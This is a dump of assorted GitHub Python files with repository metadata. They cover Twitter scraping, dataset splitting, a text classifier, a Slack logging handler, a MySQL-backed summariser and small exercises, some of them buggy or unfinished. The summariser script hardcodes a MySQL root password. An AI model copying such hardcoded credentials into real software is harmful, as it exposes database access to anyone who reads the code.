0)\n\nstartDate= utc.localize(startDate) \nendDate = utc.localize(endDate) \n\n\nlimit=1000\nfor user in df['username']:\n tweets = tweepy.Cursor(api.user_timeline, screen_name=user, count=1000, tweet_mode='extended').items(limit)\n for tweet in tweets:\n if tweet.created_at > startDate:\n user = tweet.user.screen_name\n full_text = tweet.full_text\n date = tweet.created_at\n followers_count = tweet.user.followers_count\n\n d = {\n \"username\": user,\n \"tweet\": full_text,\n \"date_created\": date,\n \"followers_count\": followers_count,\n 'project_name': project_name\n \n\n }\n\n f = Tweets(**d)\n f.insert(dba)\n time.sleep(1)\n\n","repo_name":"SarahGrevy/dec_twitter","sub_path":"twitter_data_user.py","file_name":"twitter_data_user.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7481167665","text":"def solve(k, numbers):\n n = len(numbers)\n if n % k != 0:\n return \"No\"\n else:\n parts = [[] for i in range(n//k)]\n\ndef palindrome(s):\n # Write your code here\n n = len(s)\n count = 0\n for i in range(1,n):\n for j in range(n - i):\n if isPalin(s[j:j+1]):\n count += 1\n return count\n\ndef isPalin(s): \n if len(s) <= 1:\n return True\n elif len(s) == 2:\n return s[0] == s[1]\n else:\n if s[0] == s[-1]:\n return isPalin(s[1:-1])\n else:\n return False\n\nif __name__ == \"__main__\":\n print(isPalin(\"aabaaa\"))\n \n","repo_name":"reading-stiener/For-the-love-of-algos","sub_path":"Tests/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18579628943","text":"# -*- coding: utf-8 -*-\n\nfrom . import Base\nimport sqlalchemy as db\n\n\nclass TitleCount(Base):\n __tablename__ = 'title_counts'\n\n job_uuid = db.Column(db.String, primary_key=True)\n quarter_id = db.Column(db.SmallInteger, db.ForeignKey('quarters.quarter_id'), primary_key=True)\n job_title = db.Column(db.String)\n count = db.Column(db.Integer)\n\n def __repr__(self):\n return ''.format(\n self.quarter_id, self.job_uuid, self.count\n )\n","repo_name":"workforce-data-initiative/skills-airflow","sub_path":"api_sync/v1/models/title_count.py","file_name":"title_count.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"4681781601","text":"import argparse\nimport util_news\nimport logging\nfrom check_arguments import ArgumentTypeNotValidError, are_arguments_valid\nimport argparse, logging\n\nutil_news.inherit_logging_config()\n\n@util_news.log_start_end_func\ndef parse_arguments():\n \"\"\"\n Function in Module parse_arguments\n \n Used to take user arguments from the command line.\n Format is as such:\n \n $python main.py \n\n Three arguments - type_, search_keyword, and help.\n \n type_ -> The type of news that you want; the front feed or to search up for articles\n Takes arguments `feed` and `search`\n\n search_keyword -> ONLY USED IF LAST ARGUMENT WAS `search`\n Used as the search keyword when searching\n\n help -> Automatically brings up the help text if included\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(dest=\"type_\", help=\"Is the request a search or a retreival for the top headlines?\", type=str)\n parser.add_argument(dest=\"search_keyword\", help=\"Search keyword(s), if possible\",nargs=\"?\" , default=\"\")\n #add a help text argument\n parser.add_argument(dest=\"help_\", help=\"Does the user need the help info?\", nargs=\"?\", default=\"\")\n arguments = parser.parse_args()\n logging.debug(str(arguments))\n are_arguments_valid(arguments)\n return arguments\n\nparse_arguments()","repo_name":"tariksouabny/latest-news-python","sub_path":"news/parse_arguments.py","file_name":"parse_arguments.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8790183630","text":"import os, pybut, sys\n\nfrom Pyblio import Registry\n\nclass TestRegistry (pybut.TestCase):\n\n def setUp(self):\n Registry.reset()\n Registry.load_settings(pybut.src('ut_registry'))\n return\n\n def testSchemas(self):\n # The list of schemas only returns those for which we know the\n # path.\n self.failUnlessEqual(Registry.schemas(), ['with-path'])\n\n def testCategories(self):\n c = Registry.get('with-path', 'importers')\n assert len(c) == 2\n\n def testAdapters(self):\n c = Registry.get('with-adapter', 'adapters')\n self.failUnlessEqual(len(c), 1)\n\n c = c[0]\n self.failUnlessEqual(c.target, 'another/format')\n\n def testUnique(self):\n fd = open(',,sample.rip', 'w')\n fd.write('''\n[with-path]\n\npath: %(system)s/bibtex-2.xml\n''')\n fd.close()\n self.failUnlessRaises(AssertionError, Registry.load_settings, '.')\n \nsuite = pybut.suite (TestRegistry)\nif __name__ == '__main__': pybut.run (suite)\n","repo_name":"zkota/pyblio-core-1.3","sub_path":"tests/ut_registry.py","file_name":"ut_registry.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16448842368","text":"\"\"\"\n缩放点积注意力机制实现\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport math\n\nimport sys\nsys.path.append(r'myFunctions')\n\nfrom masked_softmax import masked_softmax\n\nclass DotProductAttention(nn.Module):\n \"\"\"缩放点积注意力\"\"\"\n def __init__(self, dropout, **kwargs):\n super(DotProductAttention, self).__init__(**kwargs)\n self.dropout = nn.Dropout(dropout)\n\n # queries的形状:(batch_size,查询的个数,d)\n # keys的形状:(batch_size,“键-值”对的个数,d)\n # values的形状:(batch_size,“键-值”对的个数,值的维度)\n # valid_lens的形状:(batch_size,)或者(batch_size,查询的个数)\n def forward(self, queries, keys, values, valid_lens=None):\n d = queries.shape[-1] # 查询和键的长度,要求必须相等\n # 设置transpose_b=True为了交换keys的最后两个维度\n # 使keys的形状转置为(batch_size,d,“键-值”对的个数)\n # scores的形状为(batch_size,查询的个数,“键-值”对的个数)\n scores = torch.bmm(queries, keys.transpose(1, 2)) / math.sqrt(d)\n self.attention_weights = masked_softmax(scores, valid_lens)\n # 模型为评估模式时,dropout不会起作用\n return torch.bmm(self.dropout(self.attention_weights), values)\n\n\nif __name__ == '__main__':\n queries = torch.normal(0, 1, (2, 1, 2))\n keys = torch.ones((2, 10, 2))\n values = torch.arange(40, dtype=torch.float32).reshape(1, 10, 4).repeat(\n 2, 1, 1)\n valid_lens = torch.tensor([2, 6])\n attention = DotProductAttention(dropout=0.5)\n attention.eval()\n tmp = attention(queries, keys, values, valid_lens)\n print(tmp)\n","repo_name":"Ljy0109/learn_pytorch","sub_path":"transformer/myFunctions/DotProductAttention.py","file_name":"DotProductAttention.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32995228736","text":"from openmdao.lib.datatypes.api import Float\n\nfrom vsp_wrapper.airfoil import Airfoil\nfrom vsp_wrapper.component import VSPComponent\nfrom vsp_wrapper.xml_container import XMLContainer\n\n\nclass Duct(VSPComponent):\n \"\"\" A duct. \"\"\"\n\n XMLTYPE = 'Duct'\n\n def __init__(self):\n super(Duct, self).__init__()\n self.add('duct_parms', DuctParms())\n self.add('airfoil', Airfoil())\n\n def read(self, this):\n \"\"\" Read parameters from XML tree element `this`. \"\"\"\n super(Duct, self).read(this)\n\n parms = this.find(DuctParms.XMLTAG)\n if parms is None:\n self.raise_exception('No %s element!?' % DuctParms.XMLTAG)\n self.duct_parms.read(parms)\n\n parms = this.find(Airfoil.XMLTAG)\n if parms is None:\n self.raise_exception('No %s element!?' % Airfoil.XMLTAG)\n self.airfoil.read(parms)\n\n def write(self, parent, nesting=0):\n \"\"\"\n Write parameters to XML tree under `parent`.\n Returns tree element.\n \"\"\"\n this = super(Duct, self).write(parent, nesting)\n\n self.duct_parms.write(this, nesting+1)\n self.airfoil.write(this, nesting+1)\n\n return this\n\n\nclass DuctParms(XMLContainer):\n \"\"\" XML parameters specific to a duct. \"\"\"\n\n XMLTAG = 'Duct_Parms'\n\n length = Float(5., low=0.001, high=10000.0, iotype='in',\n xmltag='Length', desc='')\n chord = Float(5., low=0.001, high=10000., iotype='in',\n xmltag='Chord', desc='')\n inlet_dia = Float(10., low=0.001, high=1000000., iotype='in',\n xmltag='Inlet_Dia', desc='')\n inlet_area = Float(10., low=0.001, high=1000000., iotype='in',\n xmltag='Inlet_Area', desc='')\n outlet_dia = Float(10., low=0.001, high=1000000., iotype='in',\n xmltag='Outlet_Dia', desc='')\n outlet_area = Float(10., low=0.001, high=1000000., iotype='in',\n xmltag='Outlet_Area', desc='')\n inlet_outlet = Float(1., low=0.1, high=10., iotype='in',\n xmltag='Inlet_Outlet', desc='')\n\n def __init__(self):\n super(DuctParms, self).__init__(self.XMLTAG)\n\n","repo_name":"OpenMDAO-Plugins/vsp_wrapper","sub_path":"src/vsp_wrapper/duct.py","file_name":"duct.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"25549830600","text":"# ****************************** Enhanced Dataset Wrappers ******************************\n#\n# Usage:\n#\n# import data_prep_utils\n# data_prep_utils.set_root(\"/content/drive/Shareddrives/{your-data-root-folder}/\")\n# from data_prep_utils import covid_19_radiography_dataset\n# data = covid_19_radiography_dataset.get_torch_dataset(transform=transforms.ToTensor())\n# loader = torch.utils.data.DataLoader(data, batch_size=64, shuffle=True)\n# ...\n#\n\n\n#\n# modules\n#\n\nfrom . import dataset\nfrom . import samplers\nfrom . import transforms\n\n\n#\n# root directory getters and setters\n#\n# set_root: this function configures root data directory. default is \"./data\" directory.\n# get_root: this function returns configured root data directory \"\"lazily\"\".\nfrom ._internal import get_root, set_root, lazy_init as init, _register_init_hook\n\n\n#\n# lazy data wrappers\n#\n\nfrom . import wrapper\n\ncovid_19_radiography_dataset = wrapper.COVID19RadiologyDataset()\nrsna_pneumonia_detection_challenge = wrapper.RSNAPneumoniaDetectionChallenge()\n\nfor w in (\n covid_19_radiography_dataset,\n rsna_pneumonia_detection_challenge\n):\n # lambda is lazy-evaluated, so do not use lambda expression.\n def __hook(__obj=w):\n return __obj.__data_root__ # warning: this may cause recursion while initialization\n _register_init_hook(__hook)\n\ndel _internal, wrapper, w, _register_init_hook, __hook # remove redundant classes from namespace\n\n\n__all__ = [\n\n # modules,\n 'dataset', 'samplers', 'transforms',\n\n # root directory getters and setters,\n 'get_root', 'set_root', 'init',\n\n # and wrapped datasets.\n 'rsna_pneumonia_detection_challenge',\n 'covid_19_radiography_dataset'\n\n]\n","repo_name":"kdha0727/lung-opacity-and-covid-chest-x-ray-detection","sub_path":"data_prep_utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"25473800246","text":"import sys\nimport os\n\nsys.path.insert(0, os.path.realpath('%s/..' % os.path.dirname(__file__)))\nimport autoconf\nimport plugins\n\nfrom plugins import lindat_db\nplugins.install_plugin('db', lindat_db, autoconf.settings)\n\nif __name__ == '__main__':\n plugin_db = plugins.runtime.DB.instance\n redis = getattr(plugin_db, 'redis')\n # cleanup caches etc.\n redis.flushdb()\n auth_db = plugin_db.get_instance('auth')\n redis = getattr(auth_db, 'redis')\n keys = list([key for key in list(auth_db.keys()) if key != '__user_count'])\n for key in keys:\n try:\n auth_db.hash_get_all(key)\n except:\n data = redis.hgetall(key)\n for k, v in list(data.items()):\n if k == 'id':\n v = int(v)\n auth_db.hash_set(key, k, v)\n","repo_name":"czcorpus/kontext","sub_path":"scripts/fix/fix_redis_json.py","file_name":"fix_redis_json.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"31"} +{"seq_id":"23587424298","text":"#!/usr/bin/env python\n\"\"\"\\\nfileEditor.py\n\nA file editor that can create files and can edit the desired file.\nFile path is fixed however\nusage: fileEditor.py\n\"\"\"\nimport sys\nimport pickle\nimport os\n\n# flag for continuous input\nmenu = 1\n\n# if called incorrectly exit the program\nif len(sys.argv[1:]) != 0:\n sys.exit(__doc__)\n\nfileName = input(\"Put the name of the file: \")\n\n# store filepath in string\nfilepath = \"data/\" + fileName + \".pk1\"\n\ndef printfile():\n for x in output:\n print(x + \"\\r\\n\")\n return\n\ndef append():\n global output\n entering = 1\n while (entering):\n buffer = input(\"Put contents of the file ({STOP} to exit): \")\n if '{STOP}' in buffer:\n entering = 0\n else:\n output.append(buffer)\n return\n\n\ndef delete():\n global output\n entering = 1\n counter = 0\n while (entering):\n buffer = input(\"Delete contents of the file ({STOP} to exit): \")\n if '{STOP}' in buffer:\n entering = 0\n else:\n for x in output:\n counter += 1\n if buffer in x:\n output.remove(x)\n print(x + \" was removed.\")\n break\n if counter == len(output):\n print(buffer + \" was not found\")\n return\n\n# if the file does not exist already create one, otherwise append\nif not os.path.isfile(filepath):\n output = []\nelse:\n with open(filepath, \"rb\") as write_file:\n output = pickle.load(write_file)\n\n# menu for options\nwhile (menu):\n print(\"[0] Print contents of file\\r\\n[1] Input into file\\r\\n[2] Delete from file\\r\\n[3] Exit and Save\")\n choice = input(\"_: \")\n if \"0\" in choice:\n printfile()\n elif \"1\" in choice:\n append()\n elif \"2\" in choice:\n delete()\n elif \"3\" in choice:\n menu = 0\n\n\nwith open(filepath, \"wb\") as write_file:\n pickle.dump(output, write_file)\n","repo_name":"Piyotr-K/discordbotv2","sub_path":"HGBot/fileEditor.py","file_name":"fileEditor.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28066078097","text":"import numpy as np\nfrom scipy import sparse\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\nfrom constants import TRAIN_RATIO, VALIDATION_RATIO, TEST_RATIO, RANDOM_SEED\nfrom data.bible.training_data import get_corresponding_sentences_in_bible as get_pairs\nfrom data.bible.training_data import get_corresponding_sentences_in_book_multiple_by_title\nfrom embedding.embedder import word2vec\nfrom pair_nn import get_hidden\n\n# WYC-WEB 0.97 accuracy\n#trans_pairs = get_pairs('WYC', 'WEB')\n\n# ASV-CEB 0.95 accuracy\n# trans_pairs = get_pairs('ASV', 'CEB')\n\n# trans_pairs = get_corresponding_sentences_in_bible_multiple(['ASV', 'CEB', 'WYC', 'WEB'])\n\nuse_svm = True\ndef _get_classifier(c):\n if use_svm:\n return SVC(C=c, kernel='rbf', gamma=0.005)\n else:\n return LogisticRegression(C=c)\n\ndef get_corpus(trans1, trans2):\n vocab = set()\n trans_pairs = get_pairs(trans1, trans2)\n trans_pairs = [[translation.split(' ') for translation in pair] for pair in trans_pairs]\n\n for trans_pair in trans_pairs:\n for translation in trans_pair:\n for word in translation:\n vocab.add(word)\n\n return trans_pairs, vocab\n\ndef perform_split(feature_vectors, labels):\n train_val_feature_vectors, test_feature_vectors, train_val_labels, test_labels = train_test_split(\n feature_vectors, labels, test_size=TEST_RATIO, random_state=RANDOM_SEED\n )\n\n scaler = StandardScaler().fit(train_val_feature_vectors)\n train_val_feature_vectors = scaler.transform(train_val_feature_vectors)\n test_feature_vectors = scaler.transform(test_feature_vectors)\n\n test_feature_vectors = sparse.csr_matrix(test_feature_vectors)\n\n train_feature_vectors, validation_feature_vectors, train_labels, validation_labels = train_test_split(\n train_val_feature_vectors, train_val_labels, test_size=(VALIDATION_RATIO)/(VALIDATION_RATIO+TRAIN_RATIO), random_state=RANDOM_SEED\n )\n\n train_val_feature_vectors = sparse.csr_matrix(train_val_feature_vectors)\n train_feature_vectors = sparse.csr_matrix(train_feature_vectors)\n validation_feature_vectors = sparse.csr_matrix(validation_feature_vectors)\n\n print(\"Split dataset into training, test and validation sets.\")\n print(\"Training size: {}\".format(np.shape(train_feature_vectors)))\n print(\"Validation size: {}\".format(np.shape(validation_feature_vectors)))\n print(\"Test size: {}\".format(np.shape(test_feature_vectors)))\n return train_feature_vectors, validation_feature_vectors, train_val_feature_vectors, test_feature_vectors, train_labels, validation_labels, train_val_labels, test_labels\n\ndef get_unigram_features(trans1, trans2, use_unk=True):\n trans_pairs, vocab = get_corpus(trans1, trans2)\n word_to_index = {}\n num_words = 1\n for word in vocab:\n if use_unk and word not in word2vec.vocab:\n word_to_index[word] = 0\n else:\n word_to_index[word] = num_words\n num_words += 1\n\n print(\"Extracted vocabulary and mapping.\")\n\n # potentially speed this up by using a sparse representation.\n feature_vectors = []\n labels = []\n for trans_pair in trans_pairs:\n for i, translation in enumerate(trans_pair):\n unigram_features = [0.0]*num_words\n for word in translation:\n if word in vocab:\n unigram_features[word_to_index[word]] = 1.0\n feature_vectors.append(unigram_features)\n labels.append(i)\n\n print(\"Converted sentences to feature vectors and labels.\")\n print(\"\\tLabels: {}\".format(np.array(labels)))\n\n ret = perform_split(feature_vectors, labels)\n del feature_vectors\n del labels\n return ret\n\ndef get_nn_features():\n features1, features2 = get_hidden([\"style\", \"logvar_style\"])\n num_sents, num_feats = features1.shape\n labels = np.concatenate((np.array([0]*num_sents), np.array([1]*num_sents)), axis=0)\n features = np.concatenate((features1, features2), axis=0)\n features_labels = np.concatenate((features, np.expand_dims(labels, axis=1)), axis=1)\n assert features_labels.shape == (num_sents*2, num_feats+1)\n np.random.shuffle(features_labels)\n feature_vectors = features_labels[:,:-1]\n labels = features_labels[:,-1]\n\n print(\"Converted sentences to feature vectors and labels.\")\n print(\"\\tLabels: {}\".format(np.array(labels)))\n\n ret = perform_split(feature_vectors, labels)\n del feature_vectors\n del labels\n return ret\n\ndef check_matches(labels, predicted_labels):\n if np.size(labels) != np.size(predicted_labels):\n raise ValueError\n num_matches = np.sum(np.array(labels) == np.array(predicted_labels))\n proportion_matched = num_matches / np.size(labels)\n return (num_matches, proportion_matched)\n\ndef evaluate_pairs(trans1, trans2, type='unigram'):\n if type == 'unigram':\n process_inputs = get_unigram_features(trans1, trans2)\n else:\n process_inputs = get_nn_features()\n process(*process_inputs)\n\ndef process(train_feature_vectors, validation_feature_vectors, train_val_feature_vectors, test_feature_vectors, train_labels, validation_labels, train_val_labels, test_labels):\n print(\"Using validation set to optimize over value of regularization parameter in regression, C.\")\n best_acc = 0\n C_RANGE = [0.1, 1, 10]\n for C_cur in C_RANGE:\n \"\"\"\n It turns out that the default value is pretty good, with performance smoothly increasing then smoothly\n decreasing after 1. You can choose to verify this by passing in\n C_RANGE = [1e-5, 1e-4, 1e-3, 0.01, 0.1, 1, 10, 100, 1e3, 1e4, 1e5]\n \"\"\"\n print(\"\\tCurrent C: {}\".format(C_cur))\n classifier = _get_classifier(C_cur)\n classifier.fit(train_feature_vectors, train_labels)\n predicted_train_labels = classifier.predict(train_feature_vectors)\n predicted_validation_labels = classifier.predict(validation_feature_vectors)\n (_, train_acc) = check_matches(train_labels, predicted_train_labels)\n (_, val_acc) = check_matches(validation_labels, predicted_validation_labels)\n print(\"\\t\\tTraining accuracy: {}\".format(train_acc))\n print(\"\\t\\tValidation accuracy: {}\".format(val_acc))\n if val_acc > best_acc:\n best_C = C_cur\n best_acc = val_acc\n\n print(\"Done training and validating. Best C found: {}, Best accuracy on validation: {}\".format(best_C, best_acc))\n\n classifier = _get_classifier(best_C)\n classifier.fit(train_val_feature_vectors, train_val_labels)\n predicted_train_val_labels = classifier.predict(train_val_feature_vectors)\n predicted_test_labels = classifier.predict(test_feature_vectors)\n (num_matches_train, accuracy_train) = check_matches(train_val_labels, predicted_train_val_labels)\n (num_matches_test, accuracy_test) = check_matches(test_labels, predicted_test_labels)\n print(\"Accuracy on train {}\".format(accuracy_train))\n print(\"Accuracy on test {}\".format(accuracy_test))\n\nif __name__ == '__main__':\n evaluate_pairs('NIV', 'NIRV', type='nn')\n","repo_name":"bshimanuki/6.864","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71223565849","text":"'''\nEjercicio 3.20\nEl programa debe:\n\nPedir al usuario una cantidad de tramos de un viaje\npedir al usuario la duracion en minutos de cada tramo\ncalcular el tiempo total de viaje\nno deben generar errores\n'''\n\n#Init\ntramos = None\nduracion = None\ntotal = 0\n\n#Procesos\ntry:\n tramos = int(input('Ingrese la cantidad de tramos: '))\n for i in range(0, tramos):\n duracion = float(input('Ingrese los minutos del tramo: '))\n total += duracion\n print(f'La duracion es de: {round(total, 2)}')\n \nexcept Exception as error:\n print(f'Error{error}')","repo_name":"OmegaMLM/Algoritmos_Datos","sub_path":"Ejercicios/U3/ejercicio3_20.py","file_name":"ejercicio3_20.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19066336002","text":"import os\nimport random\nimport shutil\n\n\n# This script splits all available images and labels at root_path into train, val and test sets in\n# the ratio 0.7:0.15:0.15, and then copy each image label pair to the correct folders, specified\n# by the outputs dictionary.\n# The same file structure is maintained in this process so that the SpaceNet utilities code can be\n# applied to each folder (train, val, test) without modification.\n# This is necessary even though the SpaceNet utilities code also splits the data into trainval and test\n# as it creates mask annotations from polygon labels, because that process only split the data after smaller chips are created from larger, raw images with some overlap.\n\n\nroot_path = '~/building_extraction/raw_data/'\n\nimage_dir_path = os.path.join(root_path, 'AOI_2_Vegas_Train', 'RGB-PanSharpen')\nlabel_dir_path = os.path.join(root_path, 'AOI_2_Vegas_Train', 'geojson', 'buildings')\n\nimage_names = os.listdir(image_dir_path)\nlabel_names = []\n\nfor image_name in image_names:\n if image_name.endswith('.tif'):\n parts = image_name.split('.')\n identifier = parts[0].split('RGB-PanSharpen_')[1]\n label_names.append('buildings_{}.geojson'.format(identifier))\n\n# check if all corresponding geojson files exist\nprint('Starting checking all required geojson files exist')\nfor label_name in label_names:\n if not os.path.exists(os.path.join(label_dir_path, label_name)):\n print('{} does not exist'.format(label_name))\n\nprint('There are {} image files, {} geojson files'.format(len(image_names), len(label_names)))\n\n# RGB-PanSharpen_AOI_2_Vegas_img4856.tif\n# buildings_AOI_2_Vegas_img4867.geojson\n\nimages_labels = list(zip(image_names, label_names))\nprint('First pair before shuffle: {}'.format(images_labels[0]))\nrandom.shuffle(images_labels) # in-place\nprint('First pair after shuffle: {}'.format(images_labels[0]))\n\ntrain_len = int(len(images_labels) * 0.7)\nval_len = int(len(images_labels) * 0.15)\n\nsplits = {}\nsplits['train'] = images_labels[:train_len]\nsplits['val'] = images_labels[train_len:train_len + val_len]\nsplits['test'] = images_labels[train_len + val_len:]\n\nprint('Resulting in {} train examples, {} val examples, {} test examples'.format(len(splits['train']), len(splits['val']), len(splits['test'])))\n\n# create dirs\ntrain_path = os.path.join(root_path, 'Vegas_processed_train')\nval_path = os.path.join(root_path, 'Vegas_processed_val')\ntest_path = os.path.join(root_path, 'Vegas_processed_test')\n\noutputs = {}\noutputs['train_label'] = os.path.join(train_path, 'geojson', 'buildings')\noutputs['train_image'] = os.path.join(train_path, 'RGB-PanSharpen')\noutputs['val_label'] = os.path.join(val_path, 'geojson', 'buildings')\noutputs['val_image'] = os.path.join(val_path, 'RGB-PanSharpen')\noutputs['test_label'] = os.path.join(test_path, 'geojson', 'buildings')\noutputs['test_image'] = os.path.join(test_path, 'RGB-PanSharpen')\n\nfor name, output_dir in outputs.items():\n\tos.makedirs(output_dir, exist_ok=True)\n\nfor split_name in ['train', 'val', 'test']:\n\tprint('Copying to {} output dir'.format(split_name))\n\tfor image_name, label_name in splits[split_name]:\n\t\t# copy to correct split file\n\t\tshutil.copy(os.path.join(image_dir_path, image_name), os.path.join(outputs['{}_image'.format(split_name)], image_name))\n\t\tshutil.copy(os.path.join(label_dir_path, label_name), os.path.join(outputs['{}_label'.format(split_name)], label_name))\n\nprint('End of split_train_val_test.py')\n","repo_name":"yangsiyu007/SpaceNetExploration","sub_path":"pipeline/split_train_val_test.py","file_name":"split_train_val_test.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"31"} +{"seq_id":"16747453868","text":"#from newspaper import Article\nfrom gensim.summarization.summarizer import summarize\nimport sys\nimport pymysql\n\n#MySql Connection\n#print(\"Connection...\")\nconn = pymysql.connect(host='localhost', user='root', passwd='16-76017662',db='capstone', charset='utf8', )\ncurs=conn.cursor(pymysql.cursors.DictCursor)\n\nsql = \"SELECT * FROM chatlog WHERE room_id = %s\"\nroomid = sys.argv[1]\n\nsummnum = sys.argv[2]#비율 또는 문장 갯수 입력\nsummtype = \"0\"\nsummtype = sys.argv[3]\n#curs.execute(sql,(roomid, memberid))\ncurs.execute(sql,roomid)\n\nrows = curs.fetchall()\n\n\n#print(summarize(news.text, ratio=0.1)) # 문장 비율\nresult =\"\\n\"\nfor row in rows:\n result += (row['contents'])+\"\\n\"\n\nprint(result)\n#summtype->0 : ratio\n\nif summtype == \"0\" :\n\tprint('ratio')\n\tprint(type(float(summnum)))\n\tprint(summarize(result, ratio=float(summnum))) # 비율\nelse:\n\tprint('line')\n\tprint(type(int(summnum)))\n\tprint(summarize(result, word_count=int(summnum))) #라인\n","repo_name":"kimsooho/Capstone_Web","sub_path":"Server/python2DB/textsummarylocalbackup.py","file_name":"textsummarylocalbackup.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"26676725381","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n'''\npackage of logging handler which send messages to Slack\n'''\nimport logging\nimport simplejson as json\nimport requests\n\n__version__ = '0.1.2'\n__url = 'https://github.com/tetutaro/slack_logging_handler'\n__author = 'maruyama'\n\n\nclass SlackLoggingHandler(logging.Handler):\n\tdefault_emojis = {\n\t\tlogging.NOTSET: ':question:',\n\t\tlogging.DEBUG: ':thought_balloon:',\n\t\tlogging.INFO: ':speech_balloon:',\n\t\tlogging.WARNING: ':right_anger_bubble:',\n\t\tlogging.ERROR: ':mega:',\n\t\tlogging.CRITICAL: ':loudspeaker:',\n\t}\n\n\tdef __init__(\n\t\tself, url=None, channel=None, username=None, emojis=None,\n\t\tformat='%(asctime)s: %(name)s-%(module)s: %(message)s'\n\t):\n\t\tlogging.Handler.__init__(self)\n\t\tif url is None:\n\t\t\traise ValueError('url must be set')\n\t\tself.webhook_url = url\n\t\tself.channel = channel\n\t\tself.username = username\n\t\tself.formatter = logging.Formatter(format)\n\t\tif emojis is not None:\n\t\t\tself.emojis = emojis\n\t\telse:\n\t\t\tself.emojis = SlackLoggingHandler.default_emojis\n\t\treturn\n\n\tdef _make_content(self, record):\n\t\tmsg = self.format(record)\n\t\tcontent = dict()\n\t\tif record.levelno > logging.INFO:\n\t\t\tcontent['link_names'] = 1\n\t\t\tcontent['attachments'] = [{\n\t\t\t\t'fallback': msg,\n\t\t\t\t'color': 'danger',\n\t\t\t\t'text': '@channel ' + msg,\n\t\t\t}]\n\t\telse:\n\t\t\tcontent['attachments'] = [{\n\t\t\t\t'fallback': msg,\n\t\t\t\t'color': 'good',\n\t\t\t\t'text': msg,\n\t\t\t}]\n\t\tcontent['icon_emoji'] = self.emojis[record.levelno]\n\t\tif self.username:\n\t\t\tcontent['username'] = self.username + ' ' + record.levelname\n\t\telse:\n\t\t\tcontent['username'] = record.levelname\n\t\tif self.channel:\n\t\t\tcontent['channel'] = self.channel\n\t\treturn content\n\n\tdef emit(self, record):\n\t\theaders = {'Content-type': 'application/json'}\n\t\tcontent = self._make_content(record)\n\t\ttry:\n\t\t\trequests.post(self.webhook_url, data=json.dumps(content), headers=headers)\n\t\texcept:\n\t\t\tself.handleError(record)\n\t\treturn\n","repo_name":"tetutaro/slack_logging_handler","sub_path":"slack_logging_handler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32369822547","text":"N = int( input() )\ninu = []\ninu_RG = []\ninu_GB = []\ninu_BR = []\nfor _ in range( 2 * N ):\n a, c = input().split()\n a = int( a )\n inu.append( tuple( ( a, c ) ) )\n if c == \"R\":\n inu_BR.append( tuple( ( a, c ) ) )\n inu_RG.append( tuple( ( a, c ) ) )\n elif c == \"G\":\n inu_RG.append( tuple( ( a, c ) ) )\n inu_GB.append( tuple( ( a, c ) ) )\n else:\n inu_GB.append( tuple( ( a, c ) ) )\n inu_BR.append( tuple( ( a, c ) ) )\n\ninu.sort()\ninu_RG.sort()\ninu_GB.sort()\ninu_BR.sort()\nRG = []\nGB = []\nBR = []\n\nfor i in range( len( inu_RG ) - 1 ):\n a, c = inu_RG[ i ]\n b, d = inu_RG[ i + 1 ]\n if c != d:\n RG.append( b - a )\n\nfor i in range( len( inu_GB ) - 1 ):\n a, c = inu_GB[ i ]\n b, d = inu_GB[ i + 1 ]\n if c != d:\n GB.append( b - a )\n\nfor i in range( len( inu_BR ) - 1 ):\n a, c = inu_BR[ i ]\n b, d = inu_BR[ i + 1 ]\n if c != d:\n BR.append( b - a )\n\nfrom collections import Counter\ncount = Counter()\n\nfor ( _, c ) in inu:\n count[ c ] += 1\n\nif count[ \"R\" ] % 2 == 0 and count[ \"B\" ] % 2 == 0:\n print( \"0\" )\nelse:\n if count[ \"R\" ] % 2 == 0:\n if count[ \"R\" ] == 0:\n print( min( GB ) )\n else:\n print( min( min( GB ), min( RG ) + min( BR ) ) )\n elif count[ \"G\" ] % 2 == 0:\n if count[ \"G\" ] == 0:\n print( min( BR ) )\n else:\n print( min( min( BR ), min( GB ) + min( RG ) ) )\n else:\n if count[ \"B\" ] == 0:\n print( min( RG ) )\n else:\n print( min( min( RG ), min( BR ) + min( GB ) ) 